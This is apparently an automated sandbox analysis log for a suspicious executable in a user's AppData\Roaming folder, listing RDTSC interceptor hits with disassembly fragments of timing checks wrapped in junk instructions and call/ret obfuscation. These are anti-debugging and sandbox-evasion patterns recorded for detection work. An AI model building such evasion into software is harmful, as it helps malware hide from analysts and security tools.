Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD183 second address: CAD193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F0E94F51A46h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8AC second address: CAD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8B0 second address: CAD8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8B4 second address: CAD8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E948C9FBCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8CA second address: CAD8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8D0 second address: CAD8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8D4 second address: CAD8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8D8 second address: CAD8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CAD8E6 second address: CAD8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3C9D4 second address: C3C9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FC9h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C813FE second address: C814C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov ecx, edi 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0E94F51A48h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b sub di, DF1Bh 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 jmp 00007F0E94F51A56h 0x0000003c mov dword ptr [ebp+1249606Ch], esp 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007F0E94F51A48h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c or edx, dword ptr [ebp+122D3966h] 0x00000062 cmp dword ptr [ebp+122D3A7Ah], 00000000h 0x00000069 jne 00007F0E94F51B3Ch 0x0000006f mov byte ptr [ebp+122D1CCBh], 00000047h 0x00000076 jc 00007F0E94F51A4Bh 0x0000007c mov edi, 0105AA21h 0x00000081 mov eax, D49AA7D2h 0x00000086 call 00007F0E94F51A4Fh 0x0000008b mov dword ptr [ebp+122D1C3Ch], ecx 0x00000091 pop edx 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 jne 00007F0E94F51A48h 0x0000009b pushad 0x0000009c popad 0x0000009d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81BF9 second address: C81BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C81BFF second address: C81C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C820A1 second address: C820C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F0E948C9FC1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F0E948C9FB6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C820C7 second address: C820D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C820D6 second address: C820DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C82520 second address: C82524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C82524 second address: C8252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8252A second address: C82534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C825BD second address: C825C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C825C1 second address: C8268A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0E94F51A5Fh 0x0000000c jmp 00007F0E94F51A59h 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F0E94F51A48h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ecx, dword ptr [ebp+12482FD4h] 0x00000033 lea eax, dword ptr [ebp+12496058h] 0x00000039 jnl 00007F0E94F51A60h 0x0000003f nop 0x00000040 pushad 0x00000041 push eax 0x00000042 jmp 00007F0E94F51A59h 0x00000047 pop eax 0x00000048 jc 00007F0E94F51A48h 0x0000004e push edi 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 jmp 00007F0E94F51A55h 0x00000059 jl 00007F0E94F51A46h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F0E94F51A52h 0x00000067 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8268A second address: C826EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0E948C9FB8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D235Ch], edi 0x00000028 lea eax, dword ptr [ebp+12496014h] 0x0000002e mov edx, dword ptr [ebp+122D38F2h] 0x00000034 nop 0x00000035 ja 00007F0E948C9FD3h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C826EA second address: C826EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA897 second address: CBA8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8A0 second address: CBA8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8AA second address: CBA8B4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8B4 second address: CBA8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8BC second address: CBA8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBA8C0 second address: CBA8F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0E94F51A58h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 ja 00007F0E94F51A4Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F0E94F51A46h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC10DD second address: CC10EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC10EE second address: CC10FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAB3 second address: CBFAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0E948C9FB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAC5 second address: CBFAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAD0 second address: CBFAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F0E948C9FB6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F0E948C9FBCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFAEB second address: CBFB03 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E94F51A4Eh 0x00000008 jp 00007F0E94F51A4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFF5C second address: CBFF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CBFF62 second address: CBFF8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0E94F51A52h 0x0000000f jnc 00007F0E94F51A46h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC0235 second address: CC023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC04E1 second address: CC0503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c jng 00007F0E94F51A46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC0503 second address: CC0509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC0AA0 second address: CC0AAA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6BFA second address: CC6C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0E948C9FB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6C04 second address: CC6C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 jns 00007F0E94F51A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F0E94F51A4Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 push ebx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F0E94F51A4Dh 0x00000022 jng 00007F0E94F51A46h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC59F2 second address: CC59F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC59F6 second address: CC59FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC59FF second address: CC5A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B52 second address: CC5B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F0E94F51A46h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B60 second address: CC5B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B64 second address: CC5B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B6E second address: CC5B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B74 second address: CC5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B78 second address: CC5B86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5B86 second address: CC5B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5E4A second address: CC5E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC5FAB second address: CC5FB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0E94F51A48h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6412 second address: CC6422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F0E948C9FB6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6422 second address: CC6427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6427 second address: CC6431 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E948C9FC2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6431 second address: CC6446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0E94F51A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC6446 second address: CC644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC68F7 second address: CC68FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9443 second address: CC9453 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC95C5 second address: CC95D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0E94F51A4Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC95D7 second address: CC9633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E948C9FC8h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0E948C9FC4h 0x00000018 pushad 0x00000019 jmp 00007F0E948C9FC8h 0x0000001e je 00007F0E948C9FB6h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9633 second address: CC9638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9638 second address: CC9653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E948C9FC3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CC9653 second address: CC965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCC012 second address: CCC016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFDF4 second address: CCFDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFDF8 second address: CCFDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFDFC second address: CCFE02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE02 second address: CCFE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F0E948C9FE4h 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 jmp 00007F0E948C9FC5h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE3C second address: CCFE41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE41 second address: CCFE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE49 second address: CCFE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0E94F51A71h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE85 second address: CCFE8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCFE8B second address: CCFE91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCF507 second address: CCF50B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CCF50B second address: CCF51B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F0E94F51A4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD4206 second address: CD420A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD4361 second address: CD4383 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A56h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD44EE second address: CD44F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD44F2 second address: CD4520 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F0E94F51A50h 0x00000010 jnp 00007F0E94F51A62h 0x00000016 ja 00007F0E94F51A52h 0x0000001c jne 00007F0E94F51A46h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CD4687 second address: CD468D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
